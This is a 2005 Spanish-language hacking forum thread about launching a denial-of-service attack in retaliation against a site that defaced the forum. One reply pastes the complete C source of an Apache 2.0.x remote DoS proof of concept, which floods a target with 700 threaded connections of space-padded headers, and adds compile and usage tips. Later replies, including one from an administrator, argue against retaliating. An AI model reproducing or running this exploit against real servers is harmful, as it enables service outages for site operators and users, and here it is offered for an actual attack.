Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 20, 2008, 09:15:46
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Foros De Consulta General  |  Dudas, Comentarios Y Sugerencias (Moderadores: Ricardovo, NorK, JorgeArt ™)  |  Tema: Hacer un DoS a la web que defaceo el-hacker.com/foro 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Hacer un DoS a la web que defaceo el-hacker.com/foro  (Leído 599 veces)
mastershell
Visitante
« en: Febrero 24, 2005, 10:43:34 »
« Última modificación: Febrero 24, 2005, 10:44:46 por mastershell » En línea
eit
Visitante
« Respuesta #1 en: Febrero 24, 2005, 11:01:45 »
pero esa advisory ya es vieja, ademas ese apache ya ha de estar parcheado..

Ademas para que un DoS, con un DsS no revientas un procesador, osea al llegar a un limite de RAM consumida, no puede consumir mas, ademas, en los data centers tiene muuuucha refrigeracion (parece refri de carniceria)

Pero por si te interesa ahi te va: (un xploit de un amigo de la CUM)

Código:
/*
## [+] Apache/2.0.x and prior ( <= 2.0.x ) Remote Denial of Service (DoS)
##     Proof of Concept
##
## [-] A. Alejandro Hernandez Hernandez <nitrous @danitrous.org>
## [-] http://www.danitrous.org/
## [-] 13/nov/2004
##
## [*] Advisory: http://securitytracker.com/id?1012083
##
## How it works?:
## 700 Connections, and each one do:
##
## GET / HTTP/1.0\n
## [space]x7000\n
## [space]x7000\n
## [space]x7000\n
## ...
## 9000 times
## You can modify the TOTAL_THREADS variable (connections) and '6500'
##
## COMPILATION: $gcc apache_dos_xpl.c -o exploit -lpthread
##              The flag -lpthread or -pthread IS NECESSARY !
## NOTE: Launch the exploit many times. I launched the exploit 7 or 8 times to
##       fl00d my Apache/2.0.40 on Red Hat Linux 9.0 (2.6 GHz & 128 MB RAM)
##
## gr33tz: VF Labs (www.vulnfact.com), #null people, #cum people, CRAc, t0wn3r,
##         halo, dr_fdisk, flux, dex, ran, beavis...Tek brothers & systers ;)
*/

#include<stdio.h>
#include<string.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netdb.h>
#include<pthread.h>

#define TOTAL_THREADS 700
#define SPACES 7000

char payl0ad[SPACES];
struct hostent *hostname;

void *attack(void *no_used)
{
struct sockaddr_in target;
int sokete,cont,sent_bytes=0;
char *request="GET / HTTP/1.0\n";

target.sin_family=AF_INET;
target.sin_addr=*((struct in_addr *)hostname->h_addr);
target.sin_port=htons(80);
bzero(&(target.sin_zero),8);

if((sokete=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket()");
exit(-1);
}

if((connect(sokete,(struct sockaddr *)&target,sizeof(target)))==-1)
{
perror("connect()");
exit(-1);
}

send(sokete,request,strlen(request),0);

for(cont=1;cont<=9000;cont++)
send(sokete,payl0ad,strlen(payl0ad),0);

pthread_exit(NULL);
}

main(int argc,char **argv)
{
pthread_t threads[TOTAL_THREADS];
int aux,k;

if(argc!=2)
{
fprintf(stdout,"Usage: %s <target>\n",argv[0]);
exit(-1);
}

if((hostname=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname()");
exit(0);
}

printf("\t------------------------------------------------\n");
printf("\t Apache 2.0.x & < Remote DoS - Proof of Concept \n");
printf("\t------------------------------------------------\n");
printf("\nLaunching the Attack against %s...\n",argv[1]);

memset(payl0ad,0x20,SPACES); /* 0x20 = Hex value of Blank Space = ' ' */
payl0ad[SPACES-2]='\n';
payl0ad[SPACES-1]='\0';

for(k=0;k<TOTAL_THREADS;k++)
{
if((aux=pthread_create(&threads[k],NULL,attack,(void *)0)))
{
fprintf(stdout,"Error: pthread_create()\n\n");
exit(-1);
}
}
}
En línea
4le3ek5
Visitante
« Respuesta #2 en: Febrero 25, 2005, 04:27:45 »
En línea
aBsTrAcTo
Administrador
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1892


Es que te quiero hoo

12343564 el-hacker@el-hacker.org
Ver Perfil WWW
« Respuesta #3 en: Febrero 25, 2005, 12:32:19 »
De nada sirve andar jodiendo a otros.. Al contrario seria darle importancia a algo que esta diminuto en la RED o algo que quiere importancia.. De igual forma.. si se les va a demandar tambien iria el DC contra este foro si les llegara a afectar sus servidores.

No tiene caso, tratar de seguir "una guerrita" con kiddies que buscan andar explotando bugs como pndjos..


Dejalos ser
En línea
+52 9932399664 luis =)
http://www.youtube.com/watch?v=qd5FB9q8h3U
http://www.el-hacker.net
komkal
Visitante
« Respuesta #4 en: Febrero 25, 2005, 02:54:05 »
Exacto.......Esto no es la ley del Taliot, ojo por ojo, diente por diente.

Si ellos se divierten y se entretienen con nuestro foro debemos de pensar que es un ORGULLO para nosotros, pues eso quiere decir que somos importantes, al menos para ellos, ya que buscan una web IMPORTANTE para hacer sus jueguecitos.

De todas formas, puede que se lleven un susto alguno en no mucho tiempo...... Shocked

 Grin Salu2
En línea
TeChNO
Visitante
« Respuesta #5 en: Febrero 25, 2005, 06:25:08 »
Ojo por ojo, el mundo se queda ciego! Wink
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Foros De Consulta General  |  Dudas, Comentarios Y Sugerencias (Moderadores: Ricardovo, NorK, JorgeArt ™)  |  Tema: Hacer un DoS a la web que defaceo el-hacker.com/foro « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC